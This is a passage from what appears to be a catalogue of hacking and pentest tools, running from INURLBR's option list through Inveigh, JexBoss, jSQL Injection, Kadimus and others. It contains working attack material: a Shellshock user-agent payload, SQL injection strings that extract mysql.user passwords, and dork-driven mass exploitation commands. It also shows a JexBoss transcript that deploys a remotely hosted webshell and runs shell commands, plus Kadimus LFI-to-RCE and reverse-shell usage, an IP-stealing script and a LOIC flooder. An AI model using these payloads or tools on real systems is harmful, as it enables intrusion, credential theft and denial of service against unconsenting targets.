     Example: --time-proxy {second}
     Usage:   --time-proxy 10

 --proxy-http-file Set file with urls http proxy, 
     are used to bular capch search engines
     Example: --proxy-http-file {youfilehttp}
     Usage:   --proxy-http-file http_proxys.txt


 --tor-random Enables the TOR function, each usage links an unique IP.

 -t  Choose the validation type: op 1, 2, 3, 4, 5
     [options]:
     1   - The first type uses default errors considering the script:
     It establishes connection with the exploit through the get method.
     Demo: www.alvo.com.br/pasta/index.php?id={exploit}

     2   -  The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'
     It also establishes connection with the exploit through the get method
     Demo: www.alvo.com.br/pasta/index.php?id={exploit}

     3   - The third type combine both first and second types:
     Then, of course, it also establishes connection with the exploit through the get method
     Demo: www.target.com.br{exploit}
     Default:    1
     Example: -t {op}
     Usage:   -t 1

     4   - The fourth type a validation based on source file and will be enabled scanner standard functions.
     The source file their values are concatenated with target url.
     - Set your target with command --target {http://target}
     - Set your file with command -o {file}
     Explicative:
     Source file values:
     /admin/index.php?id=
     /pag/index.php?id=
     /brazil.php?new=
     Demo: 
     www.target.com.br/admin/index.php?id={exploit}
     www.target.com.br/pag/index.php?id={exploit}
     www.target.com.br/brazil.php?new={exploit}

     5   - (FIND PAGE) The fifth type of validation based on the source file,
     Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.
     - Set your target with command --target {http://target}
     - Set your file with command -o {file}
     Explicative:
     Source file values:
     /admin/admin.php
     /admin.asp
     /admin.aspx
     Demo: 
     www.target.com.br/admin/admin.php
     www.target.com.br/admin.asp
     www.target.com.br/admin.aspx
     Observation: If it shows the code 200 will be separated in the output file

     DEFAULT ERRORS:  

     [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL,           [*]ZEND FRAMEWORK, 
     [*]ERROR MARIADB,   [*]ERROR MYSQL,          [*]ERROR JBOSSWEB,        [*]ERROR MICROSOFT,
     [*]ERROR ODBC,      [*]ERROR POSTGRESQL,     [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
     [*]CMS WORDPRESS,   [*]SHELL WEB,            [*]ERROR JDBC,            [*]ERROR ASP,
     [*]ERROR ORACLE,    [*]ERROR DB2,            [*]JDBC CFM,              [*]ERROS LUA, 
     [*]ERROR INDEFINITE


 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'

 --dork-file Set font file with your search dorks.
     Example: --dork-file {dork_file}
     Usage:   --dork-file 'dorks.txt'

 --exploit-get Defines which exploit will be injected through the GET method to each URL found.
     Example: --exploit-get {exploit_get}
     Usage:   --exploit-get "?'´%270x27;"

 --exploit-post Defines which exploit will be injected through the POST method to each URL found.
     Example: --exploit-post {exploit_post}
     Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'

 --exploit-command Defines which exploit/parameter will be executed in the options: --command-vul/ --command-all.   
     The exploit-command will be identified by the paramaters: --command-vul/ --command-all as _EXPLOIT_      
     Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'
     _TARGET_ is the specified URL/TARGET obtained by the process
     _EXPLOIT_ is the exploit/parameter defined by the option --exploit-command.
     Example: --exploit-command {exploit-command}
     Usage:   --exploit-command '/admin/config.conf'  

 -a  Specify the string that will be used on the search script:
     Example: -a {string}
     Usage:   -a '<title>hello world</title>'

 -d  Specify the script usage op 1, 2, 3, 4, 5.
     Example: -d {op}
     Usage:   -d 1 /URL of the search engine.
              -d 2 /Show all the url.
              -d 3 /Detailed request of every URL.
              -d 4 /Shows the HTML of every URL.
              -d 5 /Detailed request of all URLs.
              -d 6 /Detailed PING - PONG irc.    

 -s  Specify the output file where it will be saved the vulnerable URLs.

     Example: -s {file}
     Usage:   -s your_file.txt

 -o  Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
     Example: -o {file_where_my_urls_are}
     Usage:   -o tests.txt

 --persist  Attempts when Google blocks your search.
     The script tries to another google host / default = 4
     Example: --persist {number_attempts}
     Usage:   --persist 7

 --ifredirect  Return validation method post REDIRECT_URL
     Example: --ifredirect {string_validation}
     Usage:   --ifredirect '/admin/painel.php'

 -m  Enable the search for emails on the urls specified.

 -u  Enables the search for URL lists on the url specified.

 --gc Enable validation of values ​​with google webcache.

 --pr  Progressive scan, used to set operators (dorks), 
     makes the search of a dork and valid results, then goes a dork at a time.

 --file-cookie Open cookie file.

 --save-as Save results in a certain place.

 --shellshock Explore shellshock vulnerability by setting a malicious user-agent.

 --popup Run --command all or vuln in a parallel terminal.

 --cms-check Enable simple check if the url / target is using CMS.

 --no-banner Remove the script presentation banner.

 --unique Filter results in unique domains.

 --beep Beep sound when a vulnerability is found.

 --alexa-rank Show alexa positioning in the results.

 --robots Show values file robots.

 --range Set range IP.
      Example: --range {range_start,rage_end}
      Usage:   --range '172.16.0.5#172.16.0.255'

 --range-rand Set amount of random ips.
      Example: --range-rand {rand}
      Usage:   --range-rand '50'

 --irc Sending vulnerable to IRC / server channel.
      Example: --irc {server#channel}
      Usage:   --irc 'irc.rizon.net#inurlbrasil'

 --http-header Set HTTP header.
      Example: --http-header {youemail}
      Usage:   --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'

 --sedmail Sending vulnerable to email.
      Example: --sedmail {youemail}
      Usage:   --sedmail youemail@inurl.com.br

 --delay Delay between research processes.
      Example: --delay {second}
      Usage:   --delay 10

 --time-out Timeout to exit the process.
      Example: --time-out {second}
      Usage:   --time-out 10

 --ifurl Filter URLs by the given argument.
      Example: --ifurl {ifurl}
      Usage:   --ifurl index.php?id=

 --ifcode Validate results based on the HTTP code they return.
      Example: --ifcode {ifcode}
      Usage:   --ifcode 200

 --ifemail Filter E-mails based on their argument.
     Example: --ifemail {file_where_my_emails_are}
     Usage:   --ifemail sp.gov.br

 --url-reference Define the referring URL sent in the request against the target.
      Example: --url-reference {url}
      Usage:   --url-reference http://target.com/admin/user/valid.php

 --mp Limits the number of pages in the search engines.
     Example: --mp {limit}
     Usage:   --mp 50

 --user-agent Define the user agent used in the request against the target.
      Example: --user-agent {agent}
      Usage:   --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
      Usage-exploit / SHELLSHOCK:   
      --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'
      Complete command:    
      php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'

 --sall Saves all urls found by the scanner.
     Example: --sall {file}
     Usage:   --sall your_file.txt

 --command-vul Run this command for every vulnerable URL found.
     Example: --command-vul {command}
     Usage:   --command-vul 'nmap sV -p 22,80,21 _TARGET_'
              --command-vul './exploit.sh _TARGET_ output.txt'
              --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

 --command-all Use this command to specify a single command to run for EVERY URL found.
     Example: --command-all {command}
     Usage:   --command-all 'nmap sV -p 22,80,21 _TARGET_'
              --command-all './exploit.sh _TARGET_ output.txt'
              --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'
    [!] Observation:

    _TARGET_ will be replaced by the URL/target found; if the user
    does not supply the GET part, only the domain will be used.

    _TARGETFULL_ will be replaced by the original URL / target found.

    _TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.

    _TARGETIP_ will be replaced by the IP address of the URL / target found.

    _URI_ will be replaced by the URL path (set of folders) of the target found.

    _RANDOM_ Random strings.

    _PORT_ Capture port of the current test, within the --port-scan process.

    _EXPLOIT_  will be replaced by the specified command argument --exploit-command.
   The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_

 --replace Replace values in the target URL.
    Example:  --replace {value_old[INURL]value_new}
     Usage:   --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'
              --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'
              --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'

 --remove Remove values in the target URL.
      Example: --remove {string}
      Usage:   --remove '/admin.php?id=0'

 --regexp Use a regular expression to validate the search; the value of the
    expression will be searched for within the target/URL.
    Example:  --regexp {regular_expression}
    All Major Credit Cards:
    Usage:    --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'

    IP Addresses:
    Usage:    --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'

    EMAIL:   
    Usage:    --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'


 --regexp-filter Use a regular expression to filter the search; the value of the
     expression will be searched for within the target/URL.
    Example:  --regexp-filter {regular_expression}
    EMAIL:   
    Usage:    --regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'


    [!] Small commands manager:

 --exploit-cad Command register for use within the scanner.
    Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
    Example Format: NMAP::nmap -sV _TARGET_
    Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
    Usage:    --exploit-cad 'NMAP::nmap -sV _TARGET_' 
    Observation: Each registered command is identified by the id of its array entry.
                 Commands are logged in exploits.conf file.

 --exploit-all-id Execute registered commands / exploits by id;
    (all) runs them for each target found by the engine.
     Example: --exploit-all-id {id,id}
     Usage:   --exploit-all-id 1,2,8,22

 --exploit-vul-id Execute registered commands / exploits by id;
    (vul) runs them only if the target was considered vulnerable.
     Example: --exploit-vul-id {id,id}
     Usage:   --exploit-vul-id 1,2,8,22

 --exploit-list List all entries command in exploits.conf file.


    [!] Running subprocesses:

 --sub-file  Subprocess that injects the strings from a file
     into the URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt

 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get

 --sub-post defines whether the strings coming from 
     --sub-file will be injected via POST.
     Usage:   --sub-post


 --sub-cmd-vul Each vulnerable URL found within the sub-process
     will execute the parameters of this command.
     Example: --sub-cmd-vul {command}
     Usage:   --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'
              --sub-cmd-vul './exploit.sh _TARGET_ output.txt'
              --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

 --sub-cmd-all Run command to each target found within the sub-process scope.
     Example: --sub-cmd-all {command}
     Usage:   --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'
              --sub-cmd-all './exploit.sh _TARGET_ output.txt'
              --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'


 --port-scan Defines ports that will be validated as open.
     Example: --port-scan {ports}
     Usage:   --port-scan '22,21,23,3306'

 --port-cmd Define the command that runs when an open port is found.
     Example: --port-cmd {command}
     Usage:   --port-cmd './xpl _TARGETIP_:_PORT_'
              --port-cmd './xpl _TARGETIP_/file.php?sqli=1'

 --port-write Send values to the port.
     Example: --port-write {'value0','value1','value3'}
     Usage:   --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"



    [!] Modifying values used within script parameters:

 md5 Hash values with MD5.
     Example: md5({value})
     Usage:   md5(102030)
     Usage:   --exploit-get 'user?id=md5(102030)'

 base64 Encode values in base64.
     Example: base64({value})
     Usage:   base64(102030)
     Usage:   --exploit-get 'user?id=base64(102030)'

 hex Encode values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'

 random Generate random values.
     Example: random({character_counter})
     Usage:   random(8)
     Usage:   --exploit-get 'user?id=random(8)'


Usage
To get a list of basic options and switches use:
php inurlbr.php -h

To get a list of all options and switches use:
php inurlbr.php --help


Download INURLBR

Inveigh - A Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB


Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.

Notes
  1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture.
  2. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
  3. SMB challenge/response captures are performed by sniffing over the host system's SMB service.
  4. HTTP challenge/response captures are performed with a dedicated listener.
  5. The local LLMNR/NBNS services do not need to be disabled on the host system.
  6. LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
  7. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
  8. Ensure that the LLMNR, NBNS, SMB and HTTP ports are open within any local firewall on the host system.
  9. Output files will be created in current working directory.
  10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.

Usage

Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass script execution policy.
To execute with default settings:
Inveigh.ps1 -i localip
To execute with features enabled/disabled:
Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N


Download Inveigh

IP Thief - Simple IP Stealer in PHP


A simple PHP script to capture the IP address of anyone who opens the "imagen.php" file, with the following options:
[+] It comes with an administrator panel to view and delete IPs
[+] You can change the redirect URL of the image
[+] You can see the country of the visitor


Download IP Thief

IVRE - A Python network recon framework, based on Nmap, Bro & p0f


IVRE (Instrument de veille sur les réseaux extérieurs) or DRUNK (Dynamic Recon of UNKnown networks) is a network recon framework, including two modules for passive recon (one p0f-based and one Bro-based) and one module for active recon (mostly Nmap-based, with a bit of ZMap).
The advertising slogans are:
  • (in French): IVRE, il scanne Internet.
  • (in English): Know the networks, get DRUNK!
The names IVRE and DRUNK have been chosen as a tribute to "Le Taullier".

External programs / dependencies

IVRE relies on:
  • Python 2, version 2.6 minimum
  • Nmap & ZMap
  • Bro & p0f
  • MongoDB, version 2.6 minimum
  • a web server (successfully tested with Apache and Nginx, should work with anything capable of serving static files and run a Python-based CGI), although a test web server is now distributed with IVRE (httpd-ivre)
  • a web browser (successfully tested with recent versions of Firefox and Chromium)
  • Maxmind GeoIP free databases
  • optionally Tesseract, if you plan to add screenshots to your Nmap scan results
  • optionally Docker & Vagrant (version 1.6 minimum)
IVRE comes with (refer to the LICENSE-EXTERNAL file for the licenses):

Passive recon

The following steps will show some examples of passive network recon with IVRE. If you only want active (for example, Nmap-based) recon, you can skip this part.

Using Bro

You need to run bro (2.3 minimum) with the option -b and the location of the passiverecon.bro file. If you want to run it on the eth0 interface, for example, run:
# mkdir logs
# bro -b /usr/local/share/ivre/passiverecon/passiverecon.bro -i eth0
If you want to run it on a capture file (capture needs to be a PCAP file), run:
$ mkdir logs
$ bro -b /usr/local/share/ivre/passiverecon/passiverecon.bro -r capture
This will produce log files in the logs directory. You need to run a passivereconworker to process these files. You can try:
$ passivereconworker --directory=logs
This program will not stop by itself. You can (p)kill it; it will stop gently (as soon as it has finished processing the current file).

Using p0f

To start filling your database with information from the eth0 interface, you just need to run (passiverecon is just a sensor name here):
# p0f2db -s passiverecon iface:eth0
And from the same capture file:
$ p0f2db -s passiverecon capture

Using the results

You have two options for now:
  • the ipinfo command line tool
  • the db.passive object of the ivre.db Python module
For example, to show everything stored about an IP address or a network:
$ ipinfo 1.2.3.4
$ ipinfo 1.2.3.0/24
See the output of ipinfo --help.
To use the Python module, run for example:
$ python
>>> from ivre.db import db
>>> db.passive.get(db.passive.flt_empty)[0]
For more, run help(db.passive) from the Python shell.

Active recon

Scanning

The easiest way is to install IVRE on the "scanning" machine and run:
# runscans --routable --limit 1000 --output=XMLFork
This will run a standard scan against 1000 random hosts on the Internet by running 30 nmap processes in parallel. See the output of runscans --help if you want to do something else.
When it's over, to import the results in the database, run:
$ nmap2db -c ROUTABLE-CAMPAIGN-001 -s MySource -r scans/ROUTABLE/up
Here, ROUTABLE-CAMPAIGN-001 is a category (just an arbitrary name that you will use later to filter scan results) and MySource is a friendly name for your scanning machine (same here, an arbitrary name usable to filter scan results; by default, when you insert a scan result, if you already have a scan result for the same host address with the same source, the previous result is moved to an "archive" collection (fewer indexes) and the new result is inserted in the database).
There is an alternative to installing IVRE on the scanning machine that allows you to use several agents from one master. See the AGENT file, the program runscans-agent for the master and the agent/ directory in the source tree.

Using the results

You have three options:
  • the scancli command line tool
  • the db.nmap object of the ivre.db Python module
  • the web interface

CLI: scancli

To get all the hosts with the port 22 open:
$ scancli --port 22
See the output of scancli --help.

Python module

To use the Python module, run for example:
$ python
>>> from ivre.db import db
>>> db.nmap.get(db.nmap.flt_empty)[0]
For more, run help(db.nmap) from the Python shell.

Web interface

The interface is meant to be easy to use, it has its own documentation.


JADX - Java source code from Android Dex and Apk files


Command line and GUI tools to produce Java source code from Android Dex and Apk files.

Usage

jadx[-gui] [options] <input file> (.dex, .apk, .jar or .class)
options:
 -d, --output-dir    - output directory
 -j, --threads-count - processing threads count
 -f, --fallback      - make simple dump (using goto instead of 'if', 'for', etc)
     --cfg           - save methods control flow graph to dot file
     --raw-cfg       - save methods control flow graph (use raw instructions)
 -v, --verbose       - verbose output
 -h, --help          - print this help
Example:
 jadx -d out classes.dex


Download JADX

Java LOIC - Low Orbit Ion Cannon. A Java based network stress testing application


Low Orbit Ion Cannon. The project is a Java implementation of LOIC written by Praetox, but it is not related to the original project. The main purpose of Java LOIC is testing your network.

Java LOIC should work on most operating systems.


Download Java LOIC

JexBoss - Jboss Verify And Exploitation Tool

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.

Requirements

  • Python <= 2.7.x

Installation

To install the latest version of JexBoss, please use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py

Features

The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
  • /jmx-console
    • tested and working in JBoss versions 4, 5 and 6
  • /web-console/Invoker
    • tested and working in JBoss version 4
  • /invoker/JMXInvokerServlet
    • tested and working in JBoss versions 4 and 5

Usage example

  • Check the file "demo.png"
$ git clone https://github.com/joaomatosf/jexboss.git
$ cd jexboss
$ python jexboss.py https://site-teste.com

 * --- JexBoss: Jboss verify and EXploitation Tool  --- *
 |                                                      |
 | @author:  João Filho Matos Figueiredo                |
 | @contact: joaomatosf@gmail.com                       |
 |                                                      |
 | @update: https://github.com/joaomatosf/jexboss       |
 #______________________________________________________#


 ** Checking Host: https://site-teste.com **

 * Checking web-console:           [ OK ]
 * Checking jmx-console:           [ VULNERABLE ]
 * Checking JMXInvokerServlet:         [ VULNERABLE ]


 * Do you want to try to run an automated exploitation via "jmx-console" ?
   This operation will provide a simple command shell to execute commands on the server..
   Continue only if you have permission!
   yes/NO ? yes

 * Sending exploit code to https://site-teste.com. Wait...


 * Info: This exploit will force the server to deploy the webshell 
   available on: http://www.joaomatosf.com/rnp/jbossass.war
 * Successfully deployed code! Starting command shell, wait...

 * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * 

 * https://site-teste.com: 

 Linux fwgw 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9 21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

 CentOS release 6.5 (Final)

 uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0

[Type commands or "exit" to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin

[Type commands or "exit" to finish]
Shell> hostname
fwgw

[Type commands or "exit" to finish]
Shell> ls -all /tmp 
total 35436
drwxrwxrwt.  4 root root     4096 Nov 24 16:36 .
dr-xr-xr-x. 22 root root     4096 Nov 23 03:26 ..
-rw-r--r--.  1 root root 34630995 Out 15 18:07 snortrules-snapshot-2962.tar.gz
-rw-r--r--.  1 root root       32 Out 16 14:51 snortrules-snapshot-2962.tar.gz.md5
-rw-------.  1 root root        0 Set 20 16:45 yum.log
-rw-------.  1 root root     2743 Set 20 17:18 yum_save_tx-2014-09-20-17-18nQiKVo.yumtx
-rw-------.  1 root root     1014 Out  6 00:33 yum_save_tx-2014-10-06-00-33vig5iT.yumtx
-rw-------.  1 root root      543 Out  6 02:14 yum_save_tx-2014-10-06-02-143CcA5k.yumtx
-rw-------.  1 root root    18568 Out 14 03:04 yum_save_tx-2014-10-14-03-04Q9ywQt.yumtx
-rw-------.  1 root root      315 Out 15 16:00 yum_save_tx-2014-10-15-16-004hKzCF.yumtx

[Type commands or "exit" to finish]
Shell>


Download JexBoss

Johnny - GUI for John the Ripper


Johnny is a cross-platform open-source GUI for the popular password cracker John the Ripper.

Features
  1. user could start, pause and resume attack (though only one session is allowed globally),
  2. all attack related options work,
  3. all input file formats are supported (pure hashes, pwdump, passwd, mixed),
  4. ability to resume any previously started session via session history,
  5. suggests the format of each hash,
  6. try lucky guesses with password guessing feature,
  7. “smart” default options,
  8. accurate output of cracked passwords,
  9. config is stored in .conf file (~/.john/johnny.conf),
  10. nice error messages and other user friendly things,
  11. export of cracked passwords through clipboard,
  12. export works with office suites (tested with LibreOffice Calc),
  13. available in English and French,
  14. allows you to set environment variables for each session directly in Johnny


Joomlavs - A Black Box, Joomla Vulnerability Scanner


JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic fingerprinting and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.

How to install
JoomlaVS has so far only been tested on Debian, but the installation process should be similar across most operating systems.
  1. Ensure Ruby [2.0 or above] is installed on your system
  2. Clone the source code using git clone https://github.com/rastating/joomlavs.git
  3. Install bundler and required gems using sudo gem install bundler && bundle install

How to use
The only required option is the -u / --url option, which specifies the address to target. To do a full scan, however, the --scan-all option should also be specified, e.g. ruby joomlavs.rb -u yourjoomlatarget.com --scan-all .
A full list of options can be found below:
usage: joomlavs.rb [options]
Basic options
    -u, --url              The Joomla URL/domain to scan.
    --basic-auth           <username:password> The basic HTTP authentication credentials
    -v, --verbose          Enable verbose mode
Enumeration options
    -a, --scan-all         Scan for all vulnerable extensions
    -c, --scan-components  Scan for vulnerable components
    -m, --scan-modules     Scan for vulnerable modules
    -t, --scan-templates   Scan for vulnerable templates
    -q, --quiet            Scan using only passive methods
Advanced options
    --follow-redirection   Automatically follow redirections
    --no-colour            Disable colours in output
    --proxy                <[protocol://]host:port> HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given, HTTP will be used
    --proxy-auth           <username:password> The proxy authentication credentials
    --threads              The number of threads to use when multi-threading requests
    --user-agent           The user agent string to send with all requests


Download Joomlavs

jSQL Injection v0.73 - Java Tool For Automatic SQL Database Injection.


jSQL Injection is a lightweight application used to find database information from a distant server.

jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

jSQL is part of Kali Linux, the official new BackTrack penetration distribution.

jSQL is also included in Black Hat Sec, ArchAssault Project, BlackArch Linux and Cyborg Hawk Linux.

Change log

Coming... i18n arabic russian chinese integration, next db engines: SQLite Access MSDE...
v0.73 Authentication Basic Digest Negotiate NTLM and Kerberos, database type selection
v0.7 Batch scan, Github issue reporter, support for 16 db engines, optimized GUI
alpha-v0.6 Speed x 2 (no more hex encoding), 10 db vendors supported: MySQL Oracle SQLServer PostgreSQL DB2 Firebird Informix Ingres MaxDb Sybase. JUnit tests, log4j, i18n integration and more.
0.5 SQL shell, Uploader.
0.4 Admin page search, Brute force (md5 mysql...), Decoder (decode encode base64 hex md5...).
0.3 Distant file reader, Webshell drop, Terminal for webshell commands, Configuration backup, Update checker.
0.2 Time based algorithm, Multi-thread control (start pause resume stop), Shows URL calls.


Download jSQL Injection v0.73

Just-Metadata - Tool that Gathers and Analyzes Metadata about IP Addresses


Just-Metadata is a tool that can be used to passively gather intelligence about a large number of IP addresses and attempt to extrapolate relationships that might not otherwise be seen. Just-Metadata has "gather" modules, which are used to gather metadata about IPs loaded into the framework from multiple resources on the internet. Just-Metadata also has "analysis" modules. These are used to analyze the data loaded into Just-Metadata and perform various operations that can identify potential relationships between the loaded systems.

Just-Metadata will allow you to quickly find the Top "X" number of states, cities, timezones, etc. that the loaded IP addresses are located in. It will allow you to search for IP addresses by country. You can search all IPs to find which ones are used in callbacks as identified by VirusTotal. Want to see if any loaded IPs have been documented as taking part in attacks via the Animus Project? Just-Metadata can do it.

Additionally, it is easy to create new analysis modules to let people find other relationships between the loaded IPs based on the available data. New intel gathering modules can be added just as easily!

Setup

Ideally, you should be able to run the setup script, and it will install everything you need.
For the Shodan information gathering module, YOU WILL NEED a Shodan API key. This costs like $9 bucks, come on now, it's worth it :).

Usage

As of now, Just-Metadata is designed to read in a single text file containing IPs, each on its own line. Create this file from any source (C2 callback IPs, web server logs, etc.). Once you have this file, start Just-Metadata by calling it:
./Just-Metadata.py

Commands

help - Once in the framework, to see a listing of available commands and a description of what they do, type the "help" command.

load <filename> - The load command takes an extra parameter, the file name that you (the user) want Just-Metadata to load IP addresses from. This command will open, and load all IPs within the file to the framework.
Ex: load ipaddresses.txt

save - The save command can be used to save the current working state of Just-Metadata. This is helpful in multiple cases, such as after gathering information about IPs, and wanting to save the state off to disk to be able to work on them at a later point in time. Simply typing "save" will result in Just-Metadata saving the state to disk, and displaying the filename of the saved state.

import <statefile> - The import command can be used to load a previously saved Just-Metadata state into the framework. It will load all IPs that were saved, and all information gathered about the IP addresses. This command will require an extra parameter, the name of the state file that you want Just-Metadata to load.
Ex: import goodfile.state

list <module type> - The list command can be used to list the different types of modules loaded into Just-Metadata. This command takes an extra parameter, either "analysis" or "gather". Just-Metadata will display all modules of the requested type.
Ex: list analysis
Ex: list gather

gather <gather module name> - The gather command tells Just-Metadata to run the module specified and gather information from that source. This can be used to gather geographical information, Virustotal, whois, and more. It's all based on the module. The data gathered will be stored within the framework in memory and can also be saved to disk with the "save" command.
Ex: gather geoinfo
Ex: gather virustotal

analyze <analysis module name> - The analyze command tells Just-Metadata to run an analysis module against the data loaded into the framework. These modules can be used to find IP addresses that share the same SSH keys or SSL public key certificates, or certificate chains. They can also be used to find IP addresses used in the same callbacks by malicious executables.

ip_info <IP Address> - This command is used to dump all information about a specific IP address. This is currently being used after having run analysis modules. For example, after identifying IP addresses that share the same SSH keys, I can dump all information about those IPs. I will see if they have been used by malware, where they are located, etc.

export - The export command will have Just-Metadata dump all information that's been gathered about all IP addresses currently loaded into the framework to CSV.

Read more here.

Kadimus - LFI Scan & Exploit Tool


Kadimus is a tool to check sites for LFI vulnerabilities, and also to exploit them.

Features:
  • Check all url parameters
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • Source code disclosure
  • Multi thread scanner
  • Command shell interface through HTTP Request
  • Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)

Compile:

Installing libcurl:
  • CentOS/Fedora
# yum install libcurl-devel
  • Debian based
# apt-get install libcurl4-openssl-dev


Installing libpcre:

  • CentOS/Fedora
# yum install libpcre-devel
  • Debian based
# apt-get install libpcre3-dev


Installing libssh:
  • CentOS/Fedora
# yum install libssh-devel
  • Debian based
# apt-get install libssh-dev

And finally:
$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make


Options:
  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP Cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry-times NUMBER        number of times to retry if connection fails
    --proxy STRING              Proxy to connect, syntax: protocol://hostname:port

  Scanner:
    -u, --url STRING            Single URI to scan
    -U, --url-list FILE         File contains URIs to scan
    -o, --output FILE           File to save output results
    --threads NUMBER            Number of threads (2..1000)

  Exploitation:
    -t, --target STRING         Vulnerable Target to exploit
    --inject-at STRING          Parameter name to inject exploit
                                (only needed with RCE data and source disclosure)

  RCE:
    -X, --rce-technique=TECH    LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP Request

    -r, --reverse-shell         Try to spawn a reverse shell connection.
    -l, --listen NUMBER         port to listen

    -b, --bind-shell            Try to connect to a bind-shell
    -i, --connect-to STRING     Ip/Hostname to connect
    -p, --port NUMBER           Port number to connect

    --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)
    --ssh-target STRING         Set the SSH Host

    RCE Available techniques

      environ                   Try run PHP Code using /proc/self/environ
      input                     Try run PHP Code using php://input
      auth                      Try run PHP Code using /var/log/auth.log
      data                      Try run PHP Code using data://text

    Source Disclosure:
      -G, --get-source          Try to get the source files using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (Default: stdout)


Examples:

Scanning:
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get source code of file:
./kadimus -t localhost/?pg=contact -G -f "index.php" -O local_output.php --inject-at pg

Execute php code:
./kadimus -t localhost/?pg=php://input -C '<?php echo "pwned"; ?>' -X input

Execute command:
./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:
You can also check for RFI: put the remote URL in resource/common_files.txt together with the regex that identifies it, for example:
